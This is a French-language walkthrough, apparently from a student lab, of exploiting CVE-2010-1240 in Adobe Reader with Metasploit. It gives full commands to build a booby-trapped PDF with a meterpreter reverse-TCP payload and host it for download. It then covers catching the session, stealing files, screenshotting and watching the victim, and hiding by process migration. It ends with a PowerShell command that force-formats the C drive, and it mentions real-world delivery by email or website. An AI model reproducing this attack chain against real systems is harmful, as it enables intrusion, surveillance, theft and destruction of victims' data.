
Cette vidéo de démonstration montre comment nous pouvons contrôler l'appareil de la victime en envoyant à la cible un fichier PDF d'apparence inoffensive qui contient en réalité une charge utile intégrée. L'exploit a été rendu public sous la référence CVE-2010-1240.
présenté par
Cette vidéo de démonstration montre comment nous pouvons contrôler l'appareil de la victime en envoyant un fichier PDF à l'apparence innocente qui contient en réalité une charge utile intégrée. L'exploit a été rendu public sous le nom de CVE-2010-1240.
Dès que le PDF est ouvert dans Adobe Reader, les utilisateurs que nous avons trompés pour qu'ils acceptent les fenêtres de sécurité contextuelles nous permettront d'obtenir une session meterpreter connectée à leurs appareils via une connexion TCP inverse. Pendant ce temps, toutes leurs données et ce qu'ils font en ce moment sont sous notre surveillance.

Tout d'abord, nous lançons MSFconsole qui nous fournit une interface en ligne de commande pour accéder au framework Metasploit.
msfconsole
Ensuite, recherchons un exploit correspondant à notre plateforme Windows cible et à Adobe PDF Reader, ce qui affichera une liste complète d'exploits pouvant être utilisés pour pirater la machine Windows de la victime et exploiter les vulnérabilités d'Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
Dans cette exploitation, nous sélectionnons et utilisons le module "adobe_pdf_embedded_exe" avec la commande ci-dessous pour parvenir au détournement de la victime.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Nous pouvons également vérifier les informations de l'exploit en utilisant la commande « info » comme ci-dessous :
info
Ensuite, nous configurons le payload pour utiliser une connexion TCP inverse. Nous utilisons également Meterpreter qui fournit un shell interactif nous permettant d'utiliser toutes sortes de fonctions en insérant et en exécutant du code pour explorer la machine de la victime.
set payload windows/meterpreter/reverse_tcp
Ensuite, nous définissons l'hôte et le port d'écoute. Pour LHOST, nous devons saisir l'adresse IP de la machine de l'attaquant, qui dans ce cas est l'adresse IP de notre machine Kali (10.0.2.4)*.
*p.s.
Quant à LPORT, il nous appartient de choisir un numéro de port peu courant.
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
Ensuite, nous définissons le fichier d'entrée servant de base au PDF avec le paramètre INFILENAME*. Puis, nous définissons le nom du fichier avec quelque chose qui suscitera l'intérêt de la victime pour ouvrir le fichier PDF malveillant.
*p.s.
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
Nous pouvons revoir nos options avant de saisir la commande « exploit » pour générer la charge utile avec le PDF.
# Then we can show the info or options by
show info | show options
exploit
Une fois le fichier PDF généré, nous déplaçons le fichier vers /var/www/html, le répertoire de notre machine Kali, pour héberger le serveur d'application web afin que notre victime puisse télécharger le fichier PDF plus tard.
Note:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
Ensuite, pour configurer notre listener, nous utilisons "exploit/multi/handler". De nouveau, nous définissons le payload, LHOST et LPORT en accord avec ce que nous avons défini lors de la génération du fichier PDF malveillant. Puis nous exécutons le payload.
Note:
show info ou show options est une commande facultative à exécuter.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
Dans un autre terminal, nous vérifions le statut du serveur Apache pour nous assurer qu'il tourne afin d'héberger notre fichier PDF dans /var/www/html pour que la victime puisse le télécharger.
service apache2 status
# If it is inactive, start the service
service apache2 start
Sur la machine Windows, ouvrez un navigateur quelconque tel que Chrome et saisissez l'IP de notre Kali (10.0.2.4)* pour accéder au serveur d'application web de la machine Kali.
*Note: N'oubliez pas d'indiquer l'adresse IP de votre propre machine Kali
Ensuite, simulez l'action d'un utilisateur enregistrant le fichier PDF prévu.
Lorsque la victime ouvre le fichier dans Adobe Reader 8.1.2 en acceptant les messages de sécurité, nous pouvons alors observer sur notre machine Kali qu'une nouvelle session s'est connectée via une connexion TCP inverse.
Dans un scénario réel, nous mettrons en place un site web contenant le PDF avec charge utile intégrée pour que la victime télécharge le fichier ou le reçoive en pièce jointe par e-mail.
Ensuite, nous pouvons accéder à distance à la machine de la victime et poursuivre avec d'autres comportements malveillants dans la session meterpreter.
help
pwd
ls
Par exemple, s'il y a un fichier nommé password.txt, nous pouvons exécuter la commande download password.txt
download [folder name | filename with extension]
Bien sûr, nous pouvons écrire un script malveillant (implanter une porte dérobée) pour continuer à nous connecter à la machine Windows si nous sommes vraiment diaboliques ! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
Cependant, l'attaquant peut réduire les soupçons en migrant le processus meterpreter vers un autre processus à l'aide du module migrate dans la session meterpreter.
meterpreter> run post/windows/manage/migrate
Ici, il générera automatiquement un nouveau processus dans la machine de la victime vers lequel se migrer. La victime pourra alors supprimer le fichier PDF infecté, sans se rendre compte que le processus est déjà parti ailleurs.
L'attaquant peut en outre créer un script malveillant sur la machine cible en utilisant l'invite de commandes (cmd) ou PowerShell, capable de faire tomber tout le système d'exploitation pour qu'il ne fonctionne plus correctement.
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false